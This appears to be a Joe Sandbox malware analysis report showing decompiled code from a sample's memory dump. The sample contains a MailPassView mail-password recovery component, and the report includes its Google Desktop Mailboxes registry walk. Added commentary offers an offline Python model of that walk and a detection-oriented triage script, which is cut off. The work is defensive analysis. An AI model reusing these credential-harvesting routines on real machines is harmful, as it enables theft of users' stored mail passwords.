  • Part of subcall function 004062D1: memset.MSVCRT ref: 004062F1
  • Part of subcall function 004062D1: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
  • Part of subcall function 004062D1: _stricmp.MSVCRT(00000000,edit), ref: 00406316
• SetBkMode.GDI32(?,00000001), ref: 0040E841
• GetSysColor.USER32(00000005), ref: 0040E849
• SetBkColor.GDI32(?,00000000), ref: 0040E853
• SetTextColor.GDI32(?,00C00000), ref: 0040E861
• GetSysColorBrush.USER32(00000005), ref: 0040E869
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Color$BrushClassModeNameText_stricmpmemset
• String ID:
• API String ID: 1869857563-0
• Opcode ID: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
• Instruction ID: 70d3a7b2db974a4d4567ef1bfe72cf66993607b5e30e9ab541cb73924f0fe55d
• Opcode Fuzzy Hash: fa2efa1d352e815f872068aeb743c84bb0f55ba64056062ab12fb6989f15ddc0
• Instruction Fuzzy Hash: 8CF01D32100205BBDF152FA6DD09E9E3F25EF08711F10C53AFA19A51E1CAB5D970DB58
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 82%
E0040B105(intOrPtr __ecx, short _a4, short _a8) {
	char _v265;
	char _v520;
	char _v532;
	RECT* _v540;
	char _v560;
	intOrPtr _v564;
	char _v568;
	intOrPtr _v572;
	void* __ebx;
	void* __edi;
	void* __esi;
	int _t54;
	void* _t77;
	short _t85;
	short _t86;
	RECT* _t97;
	intOrPtr _t104;

	// Command dispatch: _a4 == 0 or 1 matches HIWORD(wParam) of WM_COMMAND for a menu (0)
	// or accelerator (1) source, and _a8 is compared against the program's own command IDs
	// (0x9c42 = 40002, 0x9c43 = 40003, 0x9c44 = 40004, 0x9c49 = 40009, 0x9c56 = 40022,
	// 0x9c58 = 40024, 0x9c59 = 40025).
	_t93 = __ecx;
	_t97 = 0;
	_t104 = __ecx;
	_v564 = __ecx;
	if(_a4 == 0 || _a4 == 1) {
		_t85 = _a8;
		if(_t85 == 0x9c42) {
			_t54 = DestroyWindow( *(_t104 + 0x108));   // 0x9c42: close the main window
		}
		_t114 = _t85 - 0x9c49;
		if(_t85 == 0x9c49) {
			_t54 = E0040AEAA(_t93, _t97, _t104, _t114);
		}
		_t115 = _t85 - 0x9c59;
		if(_t85 == 0x9c59) {
			_t54 = E0040AE70(_t97, _t104, _t115);
		}
		_t116 = _t85 - 0x9c56;
		if(_t85 == 0x9c56) {
			_t54 = E0040ADB3(_t104, _t116);
		}
		if(_a8 == 0x9c58) {
			// 0x9c58 toggles a flag bit in the object at this+0x36c, then refreshes via E0040A27F
			 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
			_t54 = E0040A27F(0, _t93, _t104, 0);
		}
		if(_a8 == 0x9c44) {
			_t54 = E0040AD9D(_t104);
		}
		if(_a8 == 0x9c43) {
			_v532 = 0x413560;
			E00401000(_t93,  &_v520, 0x412404);
			E00401000(_t93,  &_v265, 0x412440);
			_t104 = _v564;
			_push( *(_t104 + 0x108));
			_push( &_v532);
			_t77 = 0x70;
			E00401540(_t77);
			SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
                                                                                                                                                    						_t20 =  &_v540; // 0x413560
                                                                                                                                                    						_t54 = E0040143D(_t20);
                                                                                                                                                    						_t97 = 0;
                                                                                                                                                    					}
                                                                                                                                                    					_t86 = _a8;
                                                                                                                                                    					_t122 = _t86 - 0x9c41;
                                                                                                                                                    					if(_t86 == 0x9c41) {
                                                                                                                                                    						_t54 = E0040AD38(_t104, _t93, _t122);
                                                                                                                                                    					}
                                                                                                                                                    					if(_t86 != 0x9c47) {
                                                                                                                                                    						L23:
                                                                                                                                                    						__eflags = _t86 - 0x9c4f;
                                                                                                                                                    						if(_t86 != 0x9c4f) {
                                                                                                                                                    							L27:
                                                                                                                                                    							__eflags = _t86 - 0x9c48;
                                                                                                                                                    							if(_t86 == 0x9c48) {
                                                                                                                                                    								_t54 = E0040AC8A(_t104, _t86);
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _t86 - 0x9c45;
                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                    								_t100 = _t104 + 0x36c;
                                                                                                                                                    								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
                                                                                                                                                    								E0040A27F(0, _t93, _t104, __eflags);
                                                                                                                                                    								_t93 = 1;
                                                                                                                                                    								_t54 = E0040A00B( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
                                                                                                                                                    								_t97 = 0;
                                                                                                                                                    								__eflags = 0;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _a8 - 0x9c46;
                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                    								_t54 = E0040B095(_t104, __eflags, _t97);
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _a8 - 0x9c5c;
                                                                                                                                                    							if(_a8 == 0x9c5c) {
                                                                                                                                                    								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
                                                                                                                                                    								__eflags = 0;
                                                                                                                                                    								E0040A27F(0, _t93, _t104, 0);
                                                                                                                                                    								E0040A437(_t104);
                                                                                                                                                    								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _a8 - 0x9c4a;
                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                    								_t54 = E0040B095(_t104, __eflags, 1);
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _a8 - 0x9c4b;
                                                                                                                                                    							if(_a8 == 0x9c4b) {
                                                                                                                                                    								_v540 = _t97;
                                                                                                                                                    								_v560 = 0x412ff4;
                                                                                                                                                    								E00405960( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
                                                                                                                                                    								_v568 = 0x412ff4;
                                                                                                                                                    								_t54 = E0040143D( &_v560);
                                                                                                                                                    								_t104 = _v572;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _a8 - 0x9c4c;
                                                                                                                                                    							if(_a8 == 0x9c4c) {
                                                                                                                                                    								_t54 = E00408C3E( *((intOrPtr*)(_t104 + 0x370)));
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _a8 - 0x9c4e;
                                                                                                                                                    							if(_a8 == 0x9c4e) {
                                                                                                                                                    								_t54 = E00409C78( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
                                                                                                                                                    							}
                                                                                                                                                    							goto L43;
                                                                                                                                                    						}
                                                                                                                                                    						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                                                                                                                    						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
                                                                                                                                                    						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
                                                                                                                                                    							_t54 = E00408654(_t72, 0xffffffff, _t97, 2);
                                                                                                                                                    							goto L27;
                                                                                                                                                    						}
                                                                                                                                                    						_push(0xf000);
                                                                                                                                                    						_push(0x1000);
                                                                                                                                                    						goto L21;
                                                                                                                                                    					} else {
                                                                                                                                                    						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
                                                                                                                                                    							_t54 = E00408654(_t72, 0xffffffff, 2, 2);
                                                                                                                                                    							goto L23;
                                                                                                                                                    						}
                                                                                                                                                    						_push(0xf000);
                                                                                                                                                    						_push(0x2000);
                                                                                                                                                    						L21:
                                                                                                                                                    						_push(0xffffffff);
                                                                                                                                                    						_t54 = E00408654(_t72);
                                                                                                                                                    						goto L43;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					L43:
                                                                                                                                                    					return _t54;
                                                                                                                                                    				}
                                                                                                                                                    			}
                                                                                                                                                    0x0040b244
                                                                                                                                                    0x0040b24a
                                                                                                                                                    0x0040b250
                                                                                                                                                    0x0040b263
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b263
                                                                                                                                                    0x0040b252
                                                                                                                                                    0x0040b257
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b20e
                                                                                                                                                    0x0040b20e
                                                                                                                                                    0x0040b21a
                                                                                                                                                    0x0040b238
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b238
                                                                                                                                                    0x0040b21c
                                                                                                                                                    0x0040b221
                                                                                                                                                    0x0040b226
                                                                                                                                                    0x0040b226
                                                                                                                                                    0x0040b228
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b228
                                                                                                                                                    0x0040b369
                                                                                                                                                    0x0040b369
                                                                                                                                                    0x0040b36f
                                                                                                                                                    0x0040b36f

                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 0040B13E
                                                                                                                                                    • SetFocus.USER32(?,?,?), ref: 0040B1E4
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                    • String ID: `5A
                                                                                                                                                    • API String ID: 3502187192-343712130
                                                                                                                                                    • Opcode ID: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                                                                                    • Instruction ID: 7dc3b259c8ef6dbe6f4b6ee630ad47b8a618685bd7b93527759b10f323b3e488
                                                                                                                                                    • Opcode Fuzzy Hash: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                                                                                    • Instruction Fuzzy Hash: 2B519130A043019BCB25BF658845E9AB3E0EF54724F44C57FF4696F2E1CB7999818B8E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                    			E00405CEE(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                    				struct HDWP__* _v8;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				intOrPtr _t29;
                                                                                                                                                    				struct HDWP__* _t30;
                                                                                                                                                    				RECT* _t58;
                                                                                                                                                    				intOrPtr _t66;
                                                                                                                                                    
                                                                                                                                                    				_push(__ecx);
                                                                                                                                                    				_push(__ecx);
                                                                                                                                                    				_t66 = __ecx;
                                                                                                                                                    				_v12 = __ecx;
                                                                                                                                                     				if(_a4 != 5) { /* _a4 is the window message: 5 == WM_SIZE */
                                                                                                                                                     					if(_a4 != 0x24) { /* 0x24 == WM_GETMINMAXINFO */
                                                                                                                                                     						if(_a4 == 0xf) { /* 0xf == WM_PAINT */
                                                                                                                                                     							E0040173B(__ecx + 0xc);
                                                                                                                                                     						}
                                                                                                                                                     					} else {
                                                                                                                                                     						/* _a12 is the MINMAXINFO*; +0x18 / +0x1c are ptMinTrackSize.x / .y,
                                                                                                                                                     						   so the window cannot be resized below 400 x 180 pixels */
                                                                                                                                                     						_t29 = _a12;
                                                                                                                                                     						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
                                                                                                                                                     						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
                                                                                                                                                     					}
                                                                                                                                                     				} else {
                                                                                                                                                     					/* WM_SIZE: re-layout 11 child controls in one DeferWindowPos batch.
                                                                                                                                                     					   0x3ed..0x3f5 are dialog control IDs 1005..1013; 1 and 2 are IDOK / IDCANCEL */
                                                                                                                                                     					_t30 = BeginDeferWindowPos(0xb);
                                                                                                                                                     					_t58 = _t66 + 0xc;
                                                                                                                                                     					_v8 = _t30;
                                                                                                                                                     					E0040169B(_t58, _t30, 0x3ed, 0, 0, 1);
                                                                                                                                                     					E0040169B(_t58, _v8, 0x3ee, 0, 0, 1);
                                                                                                                                                     					E0040169B(_t58, _v8, 0x3f4, 0, 0, 1);
                                                                                                                                                     					E0040169B(_t58, _v8, 0x3ef, 0, 0, 1);
                                                                                                                                                     					E0040169B(_t58, _v8, 0x3f0, 1, 0, 0);
                                                                                                                                                     					E0040169B(_t58, _v8, 0x3f1, 1, 0, 0);
                                                                                                                                                     					E0040169B(_t58, _v8, 0x3f5, 1, 0, 0);
                                                                                                                                                     					E0040169B(_t58, _v8, 0x3f2, 1, 0, 0);
                                                                                                                                                     					E0040169B(_t58, _v8, 0x3f3, 1, 1, 0);
                                                                                                                                                     					E0040169B(_t58, _v8, 1, 1, 1, 0);
                                                                                                                                                     					E0040169B(_t58, _v8, 2, 1, 1, 0);
                                                                                                                                                     					EndDeferWindowPos(_v8);
                                                                                                                                                     					InvalidateRect( *(_t58 + 0x10), _t58, 1); /* hWnd stored at +0x10; bErase = TRUE */
                                                                                                                                                    					_t66 = _v12;
                                                                                                                                                    				}
                                                                                                                                                    				return E004015AE(_t66, _a4, _a8, _a12);
                                                                                                                                                    			}
                                                                                                                                                    0x00405cf1
                                                                                                                                                    0x00405cf2
                                                                                                                                                    0x00405cf9
                                                                                                                                                    0x00405cfb
                                                                                                                                                    0x00405cfe
                                                                                                                                                    0x00405df3
                                                                                                                                                    0x00405e0c
                                                                                                                                                    0x00405e11
                                                                                                                                                    0x00405e11
                                                                                                                                                    0x00405df5
                                                                                                                                                    0x00405df5
                                                                                                                                                    0x00405df8
                                                                                                                                                    0x00405dff
                                                                                                                                                    0x00405dff
                                                                                                                                                    0x00405d04
                                                                                                                                                    0x00405d07
                                                                                                                                                    0x00405d0f
                                                                                                                                                    0x00405d1d
                                                                                                                                                    0x00405d23
                                                                                                                                                    0x00405d35
                                                                                                                                                    0x00405d47
                                                                                                                                                    0x00405d59
                                                                                                                                                    0x00405d6b
                                                                                                                                                    0x00405d7d
                                                                                                                                                    0x00405d8f
                                                                                                                                                    0x00405da1
                                                                                                                                                    0x00405db3
                                                                                                                                                    0x00405dc1
                                                                                                                                                    0x00405dd0
                                                                                                                                                    0x00405dd8
                                                                                                                                                    0x00405de3
                                                                                                                                                    0x00405de9
                                                                                                                                                    0x00405dec
                                                                                                                                                    0x00405e29

                                                                                                                                                    APIs
                                                                                                                                                    • BeginDeferWindowPos.USER32 ref: 00405D07
                                                                                                                                                      • Part of subcall function 0040169B: GetDlgItem.USER32 ref: 004016AB
                                                                                                                                                      • Part of subcall function 0040169B: GetClientRect.USER32 ref: 004016BD
                                                                                                                                                      • Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727
                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 00405DD8
                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 00405DE3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                    • String ID: $
                                                                                                                                                    • API String ID: 2498372239-3993045852
                                                                                                                                                    • Opcode ID: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                                                                                                    • Instruction ID: 46e20a5f719da2480e3b09a58904212cef45bdfb275aa5f1a4c21840a4711c1e
                                                                                                                                                    • Opcode Fuzzy Hash: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                                                                                                    • Instruction Fuzzy Hash: EB316D30641254BBCB216F13DD49D9F3F7CEF86BA4F10483DB409762A1C6798E10DAA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
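
The next listing, E0040719C, is the credential-harvesting routine of interest in this section: it opens HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes, enumerates its subkeys and opens each one (the listing is cut off after the first subkey open). The Python below is an added example, not code from the sample or from Joe Sandbox, that replays that control flow against a constructed in-memory registry so it runs offline. It assumes that E0040EB3F behaves like RegOpenKeyEx (root, subkey, out-handle) and E0040EC05 like RegEnumKey (handle, index, name buffer), both returning 0 on success as the decompiled status checks imply, and that the truncated remainder of the loop advances the enumeration index; FakeRegistry, walk_mailboxes and the mailbox names are hypothetical.

```python
# Added example (not the sample's or Joe Sandbox's code): an offline model of
# the registry walk in E0040719C.  Assumptions: E0040EB3F ~ RegOpenKeyEx(root,
# subkey, &hKey), E0040EC05 ~ RegEnumKey(hKey, index, nameBuf), both returning
# 0 on success, and the cut-off loop tail advancing the enumeration index.

ERROR_SUCCESS = 0            # Win32 status codes as returned by the registry API
ERROR_FILE_NOT_FOUND = 2
ERROR_INVALID_HANDLE = 6
ERROR_NO_MORE_ITEMS = 259

HKEY_CURRENT_USER = 0x80000001                      # the literal root in the listing
MAILBOXES_KEY = r"Software\Google\Google Desktop\Mailboxes"


class FakeRegistry:
    """In-memory stand-in for the Windows registry (constructed data, hypothetical class)."""

    def __init__(self, hives):
        # hives: {root_hkey: {"path\\to\\key": [subkey names]}}
        self._hives = hives
        self._handles = {}          # open handle -> (root_hkey, path)
        self._next_handle = 0x100   # well below 0x8000000x, so handles never alias roots

    def open_key(self, root, subkey):
        """Model of E0040EB3F: returns (status, handle)."""
        if root in self._hives:
            hive, base = root, ""
        elif root in self._handles:
            hive, base = self._handles[root]
        else:
            return ERROR_INVALID_HANDLE, None
        path = subkey if not base else base + "\\" + subkey
        if path not in self._hives[hive]:
            return ERROR_FILE_NOT_FOUND, None
        handle = self._next_handle
        self._next_handle += 1
        self._handles[handle] = (hive, path)
        return ERROR_SUCCESS, handle

    def enum_key(self, handle, index):
        """Model of E0040EC05: returns (status, subkey name)."""
        if handle not in self._handles:
            return ERROR_INVALID_HANDLE, None
        hive, path = self._handles[handle]
        names = self._hives[hive][path]
        if index >= len(names):
            return ERROR_NO_MORE_ITEMS, None
        return ERROR_SUCCESS, names[index]


def walk_mailboxes(reg):
    """Replay the control flow of E0040719C against `reg`.

    Returns the full paths of the Mailboxes subkeys the sample would open,
    in enumeration order, or [] when the Google Desktop key is absent
    (the `if(_t17 == 0)` early-out in the listing).
    """
    status, root = reg.open_key(HKEY_CURRENT_USER, MAILBOXES_KEY)
    if status != ERROR_SUCCESS:
        return []
    opened = []
    index = 0
    status, name = reg.enum_key(root, index)      # E0040EC05(_v268, 0, &_v260)
    while status == ERROR_SUCCESS:                 # `if(_t21 != 0) break;`
        status, sub = reg.open_key(root, name)     # E0040EB3F(_v268, &_v260, &_v264)
        if status == ERROR_SUCCESS:
            opened.append(MAILBOXES_KEY + "\\" + name)
        index += 1                                 # assumed: the cut-off loop tail advances the index
        status, name = reg.enum_key(root, index)
    return opened


# Constructed sample data: one host with two Google Desktop mailboxes, one without.
SAMPLE_REGISTRY = FakeRegistry({
    HKEY_CURRENT_USER: {
        MAILBOXES_KEY: ["alice@example.com", "bob@example.com"],
        MAILBOXES_KEY + r"\alice@example.com": [],
        MAILBOXES_KEY + r"\bob@example.com": [],
    }
})
CLEAN_REGISTRY = FakeRegistry({HKEY_CURRENT_USER: {}})

if __name__ == "__main__":
    print(walk_mailboxes(SAMPLE_REGISTRY))   # the two mailbox subkey paths
    print(walk_mailboxes(CLEAN_REGISTRY))    # []
```

The fixed key path and the enumerate-then-open-each-subkey pattern are the parts worth carrying into detection: registry-access telemetry on Software\Google\Google Desktop\Mailboxes from any process that is not Google Desktop itself is a usable signal for this credential-recovery component.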

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040719C(void* __ecx, intOrPtr _a4) {
                                                                                                                                                    				void _v259;
                                                                                                                                                    				char _v260;
                                                                                                                                                    				char _v264;
                                                                                                                                                    				void* _v268;
                                                                                                                                                    				void* _v276;
                                                                                                                                                    				long _t17;
                                                                                                                                                    				void* _t21;
                                                                                                                                                    				void* _t24;
                                                                                                                                                    				void* _t29;
                                                                                                                                                    				int _t32;
                                                                                                                                                    				signed int _t36;
                                                                                                                                                    				void* _t39;
                                                                                                                                                    				void* _t40;
                                                                                                                                                    				void* _t41;
                                                                                                                                                    
                                                                                                                                                    				_t29 = __ecx;
                                                                                                                                                     				_t17 = E0040EB3F(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268); /* 0x80000001 == HKEY_CURRENT_USER; argument shape matches RegOpenKeyEx(root, subkey, &hKey), wrapper body not shown here */
                                                                                                                                                    				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
                                                                                                                                                    				if(_t17 == 0) {
                                                                                                                                                    					_t32 = 0;
                                                                                                                                                    					_v260 = 0;
                                                                                                                                                    					memset( &_v259, 0, 0xff);
                                                                                                                                                    					_t40 = _t39 + 0xc;
                                                                                                                                                    					_t21 = E0040EC05(_v268, 0,  &_v260);
                                                                                                                                                    					while(1) {
                                                                                                                                                    						_t41 = _t40 + 0xc;
                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						_t24 = E0040EB3F(_v268,  &_v260,  &_v264);
                                                                                                                                                    						_t40 = _t41 + 0xc;
                                                                                                                                                    						if(_t24 == 0) {
                                                                                                                                                    							E0040706C(_t29, _a4, _v264,  &_v260);
                                                                                                                                                    							RegCloseKey(_v276);
                                                                                                                                                    						}
                                                                                                                                                    						_t32 = _t32 + 1;
                                                                                                                                                    						_t21 = E0040EC05(_v268, _t32,  &_v260);
                                                                                                                                                    					}
                                                                                                                                                    					_t17 = RegCloseKey(_v268);
                                                                                                                                                    				}
                                                                                                                                                    				return _t17;
                                                                                                                                                    			}

















                                                                                                                                                    0x0040719c
                                                                                                                                                    0x004071b9
                                                                                                                                                    0x004071be
                                                                                                                                                    0x004071c3
                                                                                                                                                    0x004071ca
                                                                                                                                                    0x004071d2
                                                                                                                                                    0x004071d7
                                                                                                                                                    0x004071dc
                                                                                                                                                    0x004071e9
                                                                                                                                                    0x00407237
                                                                                                                                                    0x00407237
                                                                                                                                                    0x0040723c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407204
                                                                                                                                                    0x00407209
                                                                                                                                                    0x0040720e
                                                                                                                                                    0x0040721c
                                                                                                                                                    0x00407225
                                                                                                                                                    0x00407225
                                                                                                                                                    0x0040722c
                                                                                                                                                    0x00407232
                                                                                                                                                    0x00407232
                                                                                                                                                    0x00407242
                                                                                                                                                    0x00407242
                                                                                                                                                    0x00407249

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                                                                    • memset.MSVCRT ref: 004071D7
                                                                                                                                                      • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407225
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407242
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Google\Google Desktop\Mailboxes, xrefs: 004071AF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$EnumOpenmemset
                                                                                                                                                    • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                    • API String ID: 2255314230-2212045309
                                                                                                                                                    • Opcode ID: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                                                                                                    • Instruction ID: abca04dfe3767426288f52b4a512d9ce3e2bfadbcd13eaa8a3c626f28e0c8a54
                                                                                                                                                    • Opcode Fuzzy Hash: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                                                                                                    • Instruction Fuzzy Hash: A71142728083456BD710EE52DC01EAB7BECEB84344F04093EF995E1191E735E628DAA7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040B70A(void* __esi) {
                                                                                                                                                    				struct _WNDCLASSA _v44;
                                                                                                                                                    				struct HINSTANCE__* _t15;
                                                                                                                                                    				struct HWND__* _t20;
                                                                                                                                                    
                                                                                                                                                     				_t15 =  *0x416b94; // 0x400000 @ 0x0040b710
                                                                                                                                                     				_v44.hInstance = _t15; // @ 0x0040b715
                                                                                                                                                     				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104)); // @ 0x0040b71e
                                                                                                                                                     				_v44.lpszClassName = __esi + 4; // @ 0x0040b727
                                                                                                                                                     				_v44.style = 0; // @ 0x0040b72e
                                                                                                                                                     				_v44.lpfnWndProc = E004017C1; // @ 0x0040b731
                                                                                                                                                     				_v44.cbClsExtra = 0; // @ 0x0040b738
                                                                                                                                                     				_v44.cbWndExtra = 0; // @ 0x0040b73b
                                                                                                                                                     				_v44.hCursor = 0; // @ 0x0040b73e
                                                                                                                                                     				_v44.hbrBackground = 0x10; // @ 0x0040b741
                                                                                                                                                     				_v44.lpszMenuName = 0; // @ 0x0040b748
                                                                                                                                                     				RegisterClassA( &_v44); // @ 0x0040b74b
                                                                                                                                                     				_t20 = CreateWindowExA(0, "MailPassView", "Mail PassView", 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x416b94, __esi); // @ 0x0040b776
                                                                                                                                                     				 *(__esi + 0x108) = _t20; // @ 0x0040b77c
                                                                                                                                                     				return _t20; // @ 0x0040b784
                                                                                                                                                     			}

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassCreateRegisterWindow
                                                                                                                                                    • String ID: Mail PassView$MailPassView
                                                                                                                                                    • API String ID: 3469048531-1277648965
                                                                                                                                                    • Opcode ID: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                                                                                                                    • Instruction ID: f223c9819260e0b75888b36d0bfde8daf7ba5992c102a2aca34afaaeb944facf
                                                                                                                                                    • Opcode Fuzzy Hash: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                                                                                                                    • Instruction Fuzzy Hash: 3601ECB5D01248ABDB10CF96CD45ADFFFF8EB99B00F10812AE555F2250D7B46544CB68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
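The two routines above leave a static triage hook: the registry walk hard-codes `Software\Google\Google Desktop\Mailboxes` under HKEY_CURRENT_USER (0x80000001), and the window-registration routine hard-codes the class name `MailPassView` and the caption `Mail PassView`. The script below is an added example, not code from the Joe Sandbox report, from the sample, or from NirSoft: it scans an unpacked PE or memory image for those strings (plus the `MS Sans Serif` face name from the font routine) in both ASCII and UTF-16LE, reports the offsets, and only calls the result MailPassView when class name and caption are both present, because the registry path or the font name alone could just as well come from a legitimate Google Desktop component or any ordinary dialog. The file name `mpv_triage.py` and the sample blob are constructed for the demo.

```python
#!/usr/bin/env python3
"""Static triage for an embedded NirSoft MailPassView build (mpv_triage.py).

Added example, not code from the Joe Sandbox report or from the sample.
The indicator strings are the ones visible in the decompiled routines in
this report; the sample blob below is constructed for the demo and is not
the analysed file.
"""
import sys
from typing import Dict, List, Tuple

# Strings recovered from the decompiled MailPassView routines in this report.
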